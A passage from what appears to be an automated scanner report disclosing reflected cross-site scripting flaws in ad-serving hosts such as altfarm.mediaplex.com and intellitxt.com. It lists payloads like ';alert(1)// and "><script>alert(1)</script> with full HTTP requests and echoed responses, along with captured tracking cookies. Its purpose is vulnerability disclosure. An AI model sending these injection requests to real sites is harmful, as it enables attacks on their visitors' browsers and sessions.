GET /ad/js/17113-117439-25710-5?mpt=0.030651481123641133&mpvc=http://xads.zedo.com/ads2/c%3Fa=924366%3Bn=1452%3Bx=7936%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk=&d43c7'%3balert(1)//8d64271629e=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/marketcenters/optionscenter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17113:25710/17263:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 5:25:23 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 398
Date: Mon, 09 May 2011 16:21:31 GMT

document.write('<a target="_blank" href="http://xads.zedo.com/ads2/c?a=924366;n=1452;x=7936;c=1452000000,1452000000;g=172;i=0;1=8;2=1;s=1;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=&d43c7';alert(1)//8d64271629e=1http://altfarm.mediaplex.com/ad/ck/17113-117439-25710-5?mpt=0.030651481123641133">
...[SNIP]...

2.49. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-2 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-2

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f22bd'-alert(1)-'11079f9a7c1 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-2?mpt=[CACHEBUSTER]f22bd'-alert(1)-'11079f9a7c1&mpvc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:48:09 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 253
Date: Mon, 09 May 2011 16:18:09 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-2?mpt=[CACHEBUSTER]f22bd'-alert(1)-'11079f9a7c1&mpvc="><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

2.50. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-2 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-2

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 448d2'%3balert(1)//7b5b12c1816 was submitted in the mpvc parameter. This input was echoed as 448d2';alert(1)//7b5b12c1816 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-2?mpt=[CACHEBUSTER]&mpvc=448d2'%3balert(1)//7b5b12c1816 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 5:14:26 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 247
Date: Mon, 09 May 2011 16:18:20 GMT

document.write('<a target="_blank" href="448d2';alert(1)//7b5b12c1816http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-2?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/
...[SNIP]...

2.51. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faf22'%3balert(1)//f2824fbc687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as faf22';alert(1)//f2824fbc687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-2?mpt=[CACHEBUSTER]&mpvc=&faf22'%3balert(1)//f2824fbc687=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:53:34 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 250
Date: Mon, 09 May 2011 16:18:22 GMT

document.write('<a target="_blank" href="&faf22';alert(1)//f2824fbc687=1http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-2?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com
...[SNIP]...

2.52. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-3 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-3

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71912'-alert(1)-'26703683f44 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-3?mpt=[CACHEBUSTER]71912'-alert(1)-'26703683f44&mpvc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/16186:22724/17263:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:28:00 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 247
Date: Mon, 09 May 2011 16:20:07 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-3?mpt=[CACHEBUSTER]71912'-alert(1)-'26703683f44&mpvc="><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

2.53. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-3 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-3

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b24e'%3balert(1)//06cdf2ea507 was submitted in the mpvc parameter. This input was echoed as 6b24e';alert(1)//06cdf2ea507 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-3?mpt=[CACHEBUSTER]&mpvc=6b24e'%3balert(1)//06cdf2ea507 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/16186:22724/17263:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:02:27 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 241
Date: Mon, 09 May 2011 16:20:10 GMT

document.write('<a target="_blank" href="6b24e';alert(1)//06cdf2ea507http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-3?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/
...[SNIP]...

2.54. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-3 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b887f'%3balert(1)//37d65a40979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b887f';alert(1)//37d65a40979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-3?mpt=[CACHEBUSTER]&mpvc=&b887f'%3balert(1)//37d65a40979=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/16186:22724/17263:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:18:17 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 244
Date: Mon, 09 May 2011 16:20:12 GMT

document.write('<a target="_blank" href="&b887f';alert(1)//37d65a40979=1http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-3?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com
...[SNIP]...

2.55. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-4 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8609d'-alert(1)-'b5856689bc5 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-4?mpt=[CACHEBUSTER]8609d'-alert(1)-'b5856689bc5&mpvc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 253
Date: Mon, 09 May 2011 16:18:27 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-4?mpt=[CACHEBUSTER]8609d'-alert(1)-'b5856689bc5&mpvc="><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

2.56. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-4 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab50c'%3balert(1)//62b6d688caf was submitted in the mpvc parameter. This input was echoed as ab50c';alert(1)//62b6d688caf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-4?mpt=[CACHEBUSTER]&mpvc=ab50c'%3balert(1)//62b6d688caf HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 247
Date: Mon, 09 May 2011 16:18:40 GMT

document.write('<a target="_blank" href="ab50c';alert(1)//62b6d688cafhttp://altfarm.mediaplex.com/ad/ck/17263-119359-25710-4?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/
...[SNIP]...

2.57. http://altfarm.mediaplex.com/ad/js/17263-119359-25710-4 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17263-119359-25710-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d06f'%3balert(1)//ea3e1214627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1d06f';alert(1)//ea3e1214627 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17263-119359-25710-4?mpt=[CACHEBUSTER]&mpvc=&1d06f'%3balert(1)//ea3e1214627=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 250
Date: Mon, 09 May 2011 16:18:43 GMT

document.write('<a target="_blank" href="&1d06f';alert(1)//ea3e1214627=1http://altfarm.mediaplex.com/ad/ck/17263-119359-25710-4?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com
...[SNIP]...

2.58. http://americanbankingnews.us.intellitxt.com/al.asp [jscallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanbankingnews.us.intellitxt.com
Path:	/al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a9532%3balert(1)//6ba39e40f88 was submitted in the jscallback parameter. This input was echoed as a9532;alert(1)//6ba39e40f88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /al.asp?ts=20110509161824&adid=46353%2C4513%2C46353%2C4513%2C17912%2C46353%2C0%2C0&cc=us&di=28583000%2C32656869%2C28585137%2C32656694%2C32804624%2C28585242%2C31077580%2C32879735&hk=1&ipid=28338&mh=c854bd2356afa76e7e50ed49496779a5&pid=2%2C2%2C2%2C2%2C2%2C2%2C2%2C2&pvm=3d6edce620bb5fe69529836dea4f1e0c&pvu=8217DE1248D64533B8B83DE91BBC70C0&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0%2C0%2C0&uf=128%2C2048%2C32%2C8%2C0%2C0%2C0%2C0&ur=39296%2C4352%2C6432%2C4352%2C0%2C0%2C0%2C0&kp=230%2C588%3B104%2C638%3B253%2C683%3B164%2C733%3B570%2C1068%3B152%2C1143%3B927%2C2681%3B647%2C2699%3B&prf=ll%3A3506%7Cintl%3A19393%7Cpreprochrome%3A2%7Cgetconchrome%3A50%7Cadvint%3A19448%7Cadvl%3A19448%7Ctl%3A23879&jscallback=$iTXT.js.callback1a9532%3balert(1)//6ba39e40f88 HTTP/1.1
Host: americanbankingnews.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:20:31 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 09 May 2011 16:20:31 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1a9532;alert(1)//6ba39e40f88();}catch(e){}

2.59. http://americanbankingnews.us.intellitxt.com/iframescript.jsp [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanbankingnews.us.intellitxt.com
Path:	/iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71ee"><script>alert(1)</script>7cf764381b3 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2639%2C2621%2C2615%2C2653%2C2638%26type%3Dscript%26ipid%3D28338%26sfid%3D0a71ee"><script>alert(1)</script>7cf764381b3 HTTP/1.1
Host: americanbankingnews.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 210
Date: Mon, 09 May 2011 16:19:40 GMT
Age: 0
Connection: keep-alive

